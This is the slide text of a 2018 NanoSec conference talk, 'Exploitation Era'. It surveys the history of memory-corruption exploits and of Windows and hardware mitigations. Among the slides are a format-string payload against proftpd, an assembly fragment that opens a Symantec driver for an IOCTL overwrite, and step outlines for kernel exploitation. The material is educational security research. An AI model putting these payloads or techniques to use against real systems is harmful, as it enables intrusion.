Upgrade to Pro — share decks privately, control downloads, hide ads and more …

NanoSec Conference 2018 - Exploitation Era

October 10, 2018

NanoSec Conference 2018 - Exploitation Era

A presentation in NanoSec Conference 2018 held in Malaysia with topic Exploitation Era.


October 10, 2018

More Decks by Nafiez

Other Decks in Technology


  1. About Us Nafiez @zeifan - Memory corruption hacker - Fuzzing

    & Vulnerability Research - Live in “paradise” Yeh @iamyeh - Threat Researcher in Carbon Black - Malware Reverse Engineering - Vulnerability Analysis
  2. Introduction • Real world memory corruption exploitation (no XSS, SQLi,

    LFI, etc.) • Mid 90’s until early 2000, introduced types of vulnerabilities and exploitation • Vulnerability classes mostly introduced in Linux • More Windows “in-the wild“ exploitation
  3. Continue… • Since 2014, Windows leading in software security mitigations

    • Exploitation techniques and vulnerability classes killed in modern OS’s • Current exploitation techniques in Windows
  4. 1988 Morris Worm 1995 - 1997 Buffer Overflow 1998 -

    2000 Exploits Evolution 2001 - 2003 Protections Era 2004 - 2006 Windows Era 2007 - 2010 Evolution of Exploits
  5. Ret-2-libc Solar Designer Bypassing NX to inject code BUFFER Address

    of system() in libc Return from system() Address of string “/bin/sh” “/bin /sh\0” libc system() ret https://seclists.org/bugtraq/1997/Aug/63
  6. Format String proftpd First format string bug (introduced) ftp> ls

    aaaXXXX%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u %u%u%u%u%u%u%u%u%u%653300u%n https://seclists.org/bugtraq/1999/Sep/328
  7. 3rd Generation Exploitation Halvar Flake 1st Generation Exploits - Simple

    stack smashes - Control of EIP (RET instruction) - E.g. strcpy(), gets(), sprintf() - Easy peasy 2nd Generation Exploits - off-by-one - Control of EIP (RET instruction) - E.g. strncat(), strncpy() - No EIP control, EBP manipulation - Hard-to-find in nature 3rd Generation Exploits - Format strings, Heap Structure - E.g. printf(), malloc(), free() - Sometimes trivial to spot - No registers control https://www.blackhat.com/presentations/win-usa-02/halvarflake-winsec02.ppt
  8. Integer Overflow Mark Dowd, Chris Spencer, Neel Metha, Nishad Herath,

    Halvar Flake First introduced to public https://slideplayer.com/slide/9244035/
  9. Win32 Device Driver Sec-Labs METHOD_NEITHER ioctl memory overwrite targeting Symantec

    AntiVirus http://www.nsfocus.net/vulndb/5247 push 0 push 0 @pushsz "\\.\NAVAP" ;open the device @callx CreateFileA ;yeah - open it! mov ebx,eax ;EBX=DEVICE HANDLE cmp eax,-1 ;error ;/ jne _x00 ;if not jump to _x00 label @debug SPLOIT_TITLE,"Cannot open device ;/",IERROR jmp exit
  10. Defeating Heap Protection and DEP Bypass PTSecurity Defeating heap protection

    and bypass DEP against Windows XP SP2. https://www.ptsecurity.com/upload/corporate/ww-en/download/defeating-xpsp2-heap-protection.pdf
  11. Double-Free Vulnerabilities Matthew Conover https://www.symantec.com/connect/blogs/double-free-vulnerabilities-part-1 https://www.symantec.com/connect/blogs/double-free-vulnerabilities-part-2 Before: freelist [n-1][0x003401b8] Flink

    0x003401b8 Blink 0x003401b8 freelist [n][0x003401c0] Flink 0x00341fb0 Blink 0x00341fb0 chunk [0x00341fa8] Flink 0x003401c0 Blink 0x003401c0 After: freelist [n-1] same freelist [n] same chunk [0x00341fa8] Flink 0x003401bc Blink 0x003401c4
  12. Heap Feng Shui Alex Sotirov Heap Feng Shui using JavaScript

    attacking browser https://www.blackhat.com/presentations/bh-usa-07/Sotirov/Whitepaper/bh-usa-07-sotirov-WP.pdf
  13. Return Oriented Programming Erik Buchanan, Ryan Roemer, Stefan Savage, Hovav

    Shacham https://www.blackhat.com/presentations/bh-usa-08/Shacham/BH_US_08_Shacham_Return_Oriented_Programming.pdf
  14. Overview • Found in 2015 via fuzzing • Responsible disclosure

    to vendor (Emsisoft) • Vulnerable IOCTL 0x22e010 • Trivial to exploit: ◦ Lead to overflow and allow to write in memory and perform execution
  15. Stack Overflow Windows Kernel Exploitation Process 01 Spawn processes 02

    Get handle to vulnerable device 03 Get vulnerable IOCTL function 04 Allocate buffer (shellcode) 05 Create buffer redirects execution into shellcode
  16. Use-After-Free Use-After-Free vulnerability found. In order to exploit the vulnerability,

    chain vulnerability with Adobe Flash. Full Code Execution Exploitation were trivial to gain. ROP + Info Leak Create ROP chain using UAF vulnerability in browser and chained using Adobe Flash. ASLR bypass required, using info leak method. 03 01 02 Past Exploitation Development
  17. What happened? Developer Developer failed to audit legacy code, do

    not made any changes, using old framework, etc. Vulnerability Classes Vulnerability types and classes were still exists. Patching Patch introduced new vulnerability. Exploitation Exploitation getting more complex requires chain of vulnerability.

    RFG Hyper-V Based Security (VBS) - Kernel level (enabling ACG, CIG, RFG, CFG), CFI Windows Memory Safety Mitigations
  19. Edge Attack Surface Reduction Remove whatever feature Internet Explorer has.

    Memory Garbage Collection (MemGC) Focusing on DOM engine and turn UAF in DOM non-exploitable. Type Confusion Protection Additional checks to eliminate recurring bad casts and wrong branching on CTreePos Vulnerability Classes Killer https://www.blackhat.com/docs/us-16/materials/us-16-Weston-Windows-10-Mitigation-Improvements.pdf Stack corruption essentially eliminated Use-After-Free attack decreased Raise of Out-of-Bounds, DLL Planting and Type Confusion
  20. Use-After-Free Vulnerability found was Use-After-Free, in order to to gain

    info leak, it needs to turn to type confusion. For some cases it doesn’t need to do so. Type Confusion Usually used as part of vulnerability chain. Information Leak To bypass ASLR, an information leak needs to be done. This will help to make the exploit reliable. Full Code Execution Achieve full code execution (including remote) with full mitigation bypasses. Sandbox & Mitigation Bypass Current mitigations in Windows required multiple chains of bypass, including CFG, and ACG. 05 01 02 03 04 Current Exploitation Development
  21. Overview • Found via manual audit ◦ Focus on Adobe

    Flash Player ActiveX ( • Responsible disclosure to vendor (Adobe) • Integer Overflow in ActiveX turns NULL Pointer ◦ Adobe failed to set Kill Bit in registry by default • Exploit attempt failed ◦ Due to memory safety mitigation
  22. • Exploitation much more harder • Hardware based mitigations and

    bypasses • Past vulnerability classes remain stay • More chain types of exploitation • Software mitigations improvement • Advanced exploitation could evade security perimeter
  23. Intel Control-flow Enforcement Technology (CET) ➢ Shadow Stack (bypass?) ◦

    Second stack for program that used for control transfer operations ◦ Separate from data stack and can be enable for operation via user mode or supervisor mode ◦ Protecting return address and defend against ROP ➢ Indirect Branch Tracking (bypass?) ◦ New instruction named ENDBRANCH used to mark valid indirect CALL/JMP targets in the program ◦ Protecting free branch against JOP / COP https://software.intel.com/sites/default/files/managed/4d/2a/control-flow-enforcement-technology-preview.pdf
  24. References & Thanks • Thanks to KLKS - for reviewing

    our slide • NanoSec crew • Haroon Meer BlackHat 2010 Paper on Memory Corruption History ◦ https://media.blackhat.com/bh-us-10/whitepapers/Meer/BlackHat-USA-2010-Meer-History -of-Memory-Corruption-Attacks-wp.pdf • ...and many paper that we used as references :) • Ping us on Telegram (OWASP Malaysia) if you want to talk about exploitation and reverse engineering.